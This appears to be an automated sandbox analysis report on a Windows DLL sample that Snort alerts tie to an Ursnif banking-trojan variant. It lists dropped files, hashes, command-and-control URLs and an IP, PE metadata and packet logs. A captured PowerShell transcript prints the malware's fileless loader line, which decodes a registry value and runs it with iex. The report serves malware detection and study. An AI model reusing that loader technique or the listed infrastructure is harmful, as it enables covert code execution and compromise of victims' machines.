                              SSDEEP:96:r8ZPQ+6kBSIzjR2MqWuMv+lqt/1itCgpr:r8ZPQ+6kkIzjR2MqWuMv+lqR1iZr
                              MD5:5EDD21BA1C8AF437F843240FF522681C
                              SHA1:E8A998A143D74959F8DCBBBE9DBA74B0D4D9D9BC
                              SHA-256:298E60E3FB5ABFA79D5E0DB72F08BA43D6C7982A1FB0B3FF5FF139653F05541C
                              SHA-512:0D85CAB259DE2F5AECFAFEAD469CD4FB8119B846F110E90C4E113B4A3190C918B2B780C6C4A143D00A1D75B4BD3E1BA7178690605EEEA8BE36705639E1E011BA
                              Malicious:false
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):28172
                              Entropy (8bit):1.9263177932111364
                              Encrypted:false
                              SSDEEP:192:rFZyQd6zkdzjJ2QqWJMw+t3z7cubRl3zwz7cubhYA:rLfI4d/YQpSwa3zwuv3zwzwut7
                              MD5:E90FF1B86959F97D97684E87AB3F7817
                              SHA1:85B587F1F1FA7EE7B82C850D8256BF8E7E215201
                              SHA-256:E051DEEA1BAE06F68B74C780D73E504B2F6696273CDDFF34614E0027C8A8D099
                              SHA-512:CD592CD3E5319397AD3F2D1018295AC8E4EB0A36F20A11270A46BE51E095F98DC6E8F5CA139EC395A1012831332F0E4E7FF72E3D86F37B1557E7CE349E153BA8
                              Malicious:false
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):28140
                              Entropy (8bit):1.9175696715482693
                              Encrypted:false
                              SSDEEP:96:rNZeQu6wBS5zjx2IqWfMB+NhjpdHlhmEsjpTn4A:rNZeQu6wk5zjx2IqWfMB+N1Tlgxn4A
                              MD5:0F48B7FD8CA90F110E8BEF7E4682EBD5
                              SHA1:C8FAA577FB9EF645C505FAB36F4AFDE27EF6561A
                              SHA-256:9409DEC02170C770DD4E0F50A6E4C6AFC146D32BBFA25037A66B8464A79CB687
                              SHA-512:795A4DF8C75FACFD475CE798BA74A09F4DF26C13E8CFBFB36E804E718E6A8384A024992B1F40C633E24AB262620184B1FD2AAA6B22179FB8DBCA9BCB91AADD7C
                              Malicious:false
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\0DMy[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with very long lines, with no line terminators
                              Category:downloaded
                              Size (bytes):2456
                              Entropy (8bit):5.97847634324252
                              Encrypted:false
                              SSDEEP:48:MlibnPXXpF+lCn4XkIonzd8MTpIZMLaxaOwDRiAShsB:AqPXXpv40Ionzd8rWaoOEiB6
                              MD5:CA69CFFD97933BDB9C98DEEDCFF5CF74
                              SHA1:2E5BBAFE5ECFB6CEAF52AD34D42BF1119E9942E9
                              SHA-256:9B3C39A568F5156A5144643614466E11961C83AFF2B4E8CECFEE07954C811556
                              SHA-512:95F9DE72CBC5622CE6F2738793AFF2EAB0F721CEAE0CB5877BFE570EB069243C82F45D45877F8054B8726E7803F4DA7D318B47E9BD683262DBBEA67615407374
                              Malicious:false
                              IE Cache URL:http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\CJ[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with very long lines, with no line terminators
                              Category:downloaded
                              Size (bytes):258240
                              Entropy (8bit):5.999817357934779
                              Encrypted:false
                              SSDEEP:6144:i/d/ybCg2dciObr8mv4iQRV9JGAO/KZpAeXoIXQUkuySb39kC:i/3+UHiQyPKPPgZabtF
                              MD5:DFB6898B5C07756E927BC079F55B7EF7
                              SHA1:4972812015301D42C9E890801EA36BA4C7838AEB
                              SHA-256:46BF96945DD89AD3C83CF46973B6CD50E48C2F7C004443C99A3AE81FA0722AA4
                              SHA-512:F49798EACD58002F08F9056CB5B80D3FFFFCAB40F11914D64285603C0FB0D959898C46881C878D0B3DC8C60E4DBE017AAA50F2F0C9F92F7A216BED8D2D7241CF
                              Malicious:false
                              IE Cache URL:http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\_2BFfob[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with very long lines, with no line terminators
                              Category:downloaded
                              Size (bytes):328564
                              Entropy (8bit):5.999819521741829
                              Encrypted:false
                              SSDEEP:6144:yZcMvk11XnvwsyToGLCwu0dpjRfCwzVPJAoDaqX7FWy+tpqx2:xMvk11XvwPToGLCQpjRKwJPJba8FW9tZ
                              MD5:D65D2161F47805CD422863ED419644B3
                              SHA1:3AC0BB2B2C0BAFC14E77C3566063BAE0F89019F0
                              SHA-256:8E542AD3CCF2E42E398B6F6CDE96009D2D04EC3FEC657D2914ABAAA089B52DC5
                              SHA-512:71B6E1D8FD7069DC3D87AFED992BB82752F2CA9F5FBCE804BBB31FDBA4FE3D9AF7C21FA1214781077A4399A95714CE322B4A93ACD63F66895B0B3487F532A643
                              Malicious:false
                              IE Cache URL:http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob
                              C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):89
                              Entropy (8bit):4.412554678800314
                              Encrypted:false
                              SSDEEP:3:oVXU3KfGLJLFp498JOGXnE3KfGLJLFU7n:o9UaSwqEaSS7
                              MD5:8D36A22121E23FEE0C6FF967FABC7C9F
                              SHA1:6AB24AD3A5B5A1C3297935FD884D16607D338AB2
                              SHA-256:AC2BF550E697374F1FFF169091935EA0395783571E1111A06F56356FEBDAD232
                              SHA-512:BE7BA4CC152B1A7774EDE9D9050BB3B250BCE6202B1B966CACE74069C15302958D9EE38852F7CECA9F231DF6165B172848BA3D13018C3AF525DF850E72E50278
                              Malicious:false
                              Preview: [2021/07/05 16:52:55.597] Latest deploy version: ..[2021/07/05 16:52:55.597] 11.211.2 ..
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ip5c0f02.3tk.ps1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcbiu1ig.42d.psm1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\~DF0F558DCEA216EEDD.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40153
                              Entropy (8bit):0.6721295915726995
                              Encrypted:false
                              SSDEEP:96:kBqoxKAuvScS+mg6Tgphjpd76hjpdJhjpdq:kBqoxKAuqR+mg6Tgp1f61l12
                              MD5:3B12C53F64AA9AAE48FA99DD462323F8
                              SHA1:CEF166B313DBD447B0308D56BFF0374D73F2597B
                              SHA-256:C2DE96C4F6609F6F923AB649EDF844F622041AEBE946955765ABE8CE01785973
                              SHA-512:089EDD5B67E551892DF6A8217EC6897D32607B525DF21758CF53D6C47EA2FF4289BEC2F7AB1BEF6DCE26A3ED4753D2D30D522496BDC002562AC6A384D3C21A20
                              Malicious:false
                              C:\Users\user\AppData\Local\Temp\~DF3FF9B029E5192D75.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13413
                              Entropy (8bit):0.7018055925052197
                              Encrypted:false
                              SSDEEP:24:c9lLh9lLh9lIn9lIn9loV9lo19lWaXY2h2JiB2J+7X+5eD++5:kBqoIeAk6QF5
                              MD5:52553F46F1704934835C4DE6178D3F4F
                              SHA1:43BFB35935B24475E8D4132F993216662BF9DE1E
                              SHA-256:EFBCB3C5FF7742544DE80FD9C5FFC2D1FFF227E66B3369A0BD08EC9B8A19F334
                              SHA-512:3C5C2D89C29F519ADB6CC8E16AD963919A6CF7ADFCE6C8B043D6A39EBEE2931738AE0E0E8F671408A100C7F011ECB5381B563653AD9D783A096CE2028613BE52
                              Malicious:false
                              C:\Users\user\AppData\Local\Temp\~DF6EAF3ABE87705E33.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40105
                              Entropy (8bit):0.6629620622757341
                              Encrypted:false
                              SSDEEP:48:kBqoxKAuvScS+CkuHLIL5Rbh6gikRbh6gi3Rbh6giI:kBqoxKAuvScS+CkuH0dqtkqt3qtI
                              MD5:8B952EFE3F14FC91C368F04033DC6004
                              SHA1:12EC1BCB176427B5917FDB39E5FF45D30353AADD
                              SHA-256:72F0393157A67239BE9761E5AD53D75431586E85E49731F12B9E3FB7D426C8C7
                              SHA-512:24C94D2B87B327680B8689869CB28EA35F643E78D267A93D89D2DF7E691E5EF924CEDCA6DD2E9373E2EA1A8F70C8F3F366D437581E1CF68FFA139694F320F077
                              Malicious:false
                              C:\Users\user\AppData\Local\Temp\~DFA1E658E0CB2C92C6.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40217
                              Entropy (8bit):0.6834448918036513
                              Encrypted:false
                              SSDEEP:192:kBqoxKAuqR+rl3elc3z7cubL3z7cubU3z7cubx:kBqoxKAuqR+rl3elc3zwuf3zwuA3zwud
                              MD5:A141120014A3CB3DFECBD9C51AE5C4EB
                              SHA1:2E4F94F1A901450679304FAF45771B82E93B199B
                              SHA-256:5642AF0321783222BB59495161A237C5ECD2A5DDAE5BA20B863355949166DC46
                              SHA-512:173B0BBCDB8F135401BBCB3168A1A49CA80FDED3D6C7870584AC49F947B43B1B6F130A99E6BFB535AE4D7F2137D75564112AB98C5E6964600DC8BF92C6363D12
                              Malicious:false
                              C:\Users\user\Documents\20210705\PowerShell_transcript.116938.pbWhvSVs.20210705165307.txt
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):978
                              Entropy (8bit):5.470798394117449
                              Encrypted:false
                              SSDEEP:24:BxSAEDvBBSx2DOXUWOLCHGIYBtBCWAHjeTKKjX4CIym1ZJXaOLCHGIYBtBW:BZgv/SoORFeVAqDYB1ZkFeW
                              MD5:9C17BF4AA0CD21F8D4434FBE9C6F00E9
                              SHA1:A1489267FD0728C1392D6A9ACD41AE0DFBE2ACC8
                              SHA-256:1622DCA0170692A643AD3B4CDBED0747FD041A2DED958E5ABB17A9EEF86B7100
                              SHA-512:137F9F29206E2A35C8FE80E05C5ACF6F58FEE1AE0E136212DEABC99A288AA36BE0D009B3F15F1C3610936E2A22D375B3ADFE507EFC886BEEC3DFD2F4707BDDC1
                              Malicious:false
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210705165308..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 1384..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210705165308..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.7442139076304946
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:3a94.dll
                              File size:621568
                              MD5:3a943173c6de419b7078e88c20997838
                              SHA1:56567824c6b5c62112a74daa7a1a66e2ec0505d3
                              SHA256:af98c908f45b6b7893b8cc3121517488c94a93d015af71cd86f8269a971a8836
                              SHA512:801f8f86158c23a44499fc8c5364cb6353a44fba09015d118341e1bd07a568fe4c2fe4b93ca691bb45b41b5f6ee2a6f73d7ffbfde3eb9cd7293295ffc530693c
                              SSDEEP:12288:DDq7QuHqfYJvHfikOqXr/nQKDEaKVOjTHCmjem/s9IoxAZgv6Hqip969aqnugCSh:/evfijqLvDEfYTiOem/i6lH69/2e6c
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..\..H\..H\..H.r.IW..H.r.I...H.r.IN..H.k.IS..H.k.IO..H.k.I}..HUbIHM..H\..H...H.h.I]..H.h.I]..H.h%H]..H.h.I]..HRich\..H.......

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x104dfd0
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x1000000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x60CB68D7 [Thu Jun 17 15:23:03 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:3618a66a29eac020b8f3ecc6a1cb392b

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              cmp dword ptr [ebp+0Ch], 01h
                              jne 00007F7060AE2B57h
                              call 00007F7060AE2EE8h
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007F7060AE29FAh
                              add esp, 0Ch
                              pop ebp
                              retn 000Ch
                              push ebp
                              mov ebp, esp
                              push 00000000h
                              call dword ptr [01122160h]
                              push dword ptr [ebp+08h]
                              call dword ptr [0112215Ch]
                              push C0000409h
                              call dword ptr [01122164h]
                              push eax
                              call dword ptr [01122168h]
                              pop ebp
                              ret
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push 00000017h
                              call 00007F7060B1BD9Ch
                              test eax, eax
                              je 00007F7060AE2B57h
                              push 00000002h
                              pop ecx
                              int 29h
                              mov dword ptr [0108C920h], eax
                              mov dword ptr [0108C91Ch], ecx
                              mov dword ptr [0108C918h], edx
                              mov dword ptr [0108C914h], ebx
                              mov dword ptr [0108C910h], esi
                              mov dword ptr [0108C90Ch], edi
                              mov word ptr [0108C938h], ss
                              mov word ptr [0108C92Ch], cs
                              mov word ptr [0108C908h], ds
                              mov word ptr [0108C904h], es
                              mov word ptr [0108C900h], fs
                              mov word ptr [0108C8FCh], gs
                              pushfd
                              pop dword ptr [0108C930h]
                              mov eax, dword ptr [ebp+00h]
                              mov dword ptr [0108C924h], eax
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [0108C928h], eax

                              Rich Headers

                              Programming Language:
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              Name                                  Virtual Address  Virtual Size  Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x8abd0          0x7e          .text
                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x1222a4         0xb4          .idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x12c000         0xe68         .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x12d000         0x2af4        .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x91d4           0x54          .text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x9228           0x40          .text
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IAT             0x122000         0x29c         .idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                              Sections

                              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                              .text   0x1000           0x89c4e       0x89e00   False     0.646935913418   data       6.66432444049  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .data   0x8b000          0x96854       0x1a00    False     0.563551682692   data       5.65671037078  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .idata  0x122000         0x1108        0x1200    False     0.428602430556   data       5.38081725829  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .gfids  0x124000         0x71f7        0x7200    False     0.745922423246   data       5.77791689152  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc   0x12c000         0xe68         0x1000    False     0.340087890625   data       3.21593318356  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc  0x12d000         0x2af4        0x2c00    False     0.792702414773   data       6.66891196238  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              Name         RVA       Size   Type                   Language  Country
                              RT_DIALOG    0x12c250  0xf0   data                   English   United States
                              RT_DIALOG    0x12c340  0xe8   data                   English   United States
                              RT_DIALOG    0x12c428  0xcc   data                   English   United States
                              RT_DIALOG    0x12c4f8  0xc4   data                   English   United States
                              RT_DIALOG    0x12c5c0  0x140  data                   English   United States
                              RT_DIALOG    0x12c700  0xec   data                   English   United States
                              RT_DIALOG    0x12c7f0  0x142  data                   English   United States
                              RT_DIALOG    0x12c938  0x120  data                   English   United States
                              RT_DIALOG    0x12ca58  0x144  data                   English   United States
                              RT_DIALOG    0x12cba0  0x144  data                   English   United States
                              RT_MANIFEST  0x12cce8  0x17d  XML 1.0 document text  English   United States

                              Imports

                              DLL           Import
                              KERNEL32.dll  GetStdHandle, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, ReadConsoleW, GetFileType, CreateFileW, CloseHandle, WriteConsoleW, GetSystemTimeAsFileTime, GetWindowsDirectoryA, GetSystemDirectoryA, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetStringTypeW, GetProcessHeap, GetTempPathA, VirtualProtect, GetCurrentDirectoryA, SetSystemPowerState, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, DecodePointer
                              USER32.dll    LoadBitmapA, GetWindowLongA, DrawTextA, IsDialogMessageA, GetClassInfoExA, SetWindowTextA, GetIconInfo, SendMessageTimeoutA, DefWindowProcA, CheckDlgButton, ReleaseDC, CallNextHookEx, EnumWindows
                              GDI32.dll     SetRectRgn, CreateFontA, AbortDoc, EndDoc, GetStockObject, PtVisible, SetAbortProc, GetPixel, CreateRectRgn, SelectClipRgn, GetTextMetricsA, CombineRgn
                              ole32.dll     CoRegisterClassObject, CoRegisterSurrogate, CoUninitialize, CoInitialize
                              ADVAPI32.dll  RegOpenKeyExA, OpenServiceA, OpenThreadToken, InitializeSecurityDescriptor, FreeSid, SetSecurityDescriptorDacl, SetEntriesInAclA, RegEnumKeyA, RegCloseKey, StartServiceCtrlDispatcherA, RegOpenKeyA, QueryServiceStatus, RegDeleteKeyA, RegQueryValueExA, AllocateAndInitializeSid, LookupPrivilegeValueA, SetServiceStatus, RegisterServiceCtrlHandlerA, OpenSCManagerA, RegCreateKeyExA, DeleteService, RegSetValueExA, OpenProcessToken, GetTokenInformation
                              WS2_32.dll    WSACleanup, recv, htonl, htons, recvfrom, getservbyname, ntohs, socket, send, getservbyport, WSAStartup, getprotobynumber, setsockopt
                              COMDLG32.dll  GetSaveFileNameA, GetOpenFileNameA
                              COMCTL32.dll  ImageList_DragEnter, ImageList_DragShowNolock, ImageList_ReplaceIcon, ImageList_DragMove

                              Exports

                              Name         Ordinal  Address
                              Seasonthing  1        0x104cc20
                              Seatforce    2        0x104c3b0
                              Spaceclose   3        0x104cad0
                              Time         4        0x104c9d0

                              Possible Origin

                              Language of compilation system  Country where language is spoken
                              English                         United States

                              Network Behavior

                              Snort IDS Alerts

                              Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
                              07/05/21-16:52:45.440840  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49717        80         192.168.2.5  165.232.183.49
                              07/05/21-16:52:45.440840  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49717        80         192.168.2.5  165.232.183.49
                              07/05/21-16:52:49.870626  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49720        80         192.168.2.5  165.232.183.49
                              07/05/21-16:52:49.870626  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49720        80         192.168.2.5  165.232.183.49
                              07/05/21-16:52:56.212973  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49722        80         192.168.2.5  165.232.183.49
                              07/05/21-16:52:56.212973  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49722        80         192.168.2.5  165.232.183.49
                              07/05/21-16:53:33.216042  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49730        80         192.168.2.5  165.232.183.49
                              07/05/21-16:53:33.216042  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49730        80         192.168.2.5  165.232.183.49
                              07/05/21-16:53:35.638649  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49734        80         192.168.2.5  165.232.183.49
                              07/05/21-16:53:35.638649  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49734        80         192.168.2.5  165.232.183.49

                              TCP Packets

                              Jul 5, 2021 16:52:50.100164890 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788218021 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788268089 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788285017 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788299084 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788324118 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788345098 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.788427114 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.788522005 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.790205956 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.790234089 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.790252924 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.790273905 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.790298939 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.790328026 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.977482080 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.977598906 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.977688074 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.977782965 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.977804899 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.977848053 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.977878094 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.977935076 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.977973938 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.978003025 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978017092 CEST8049720165.232.183.49192.168.2.5
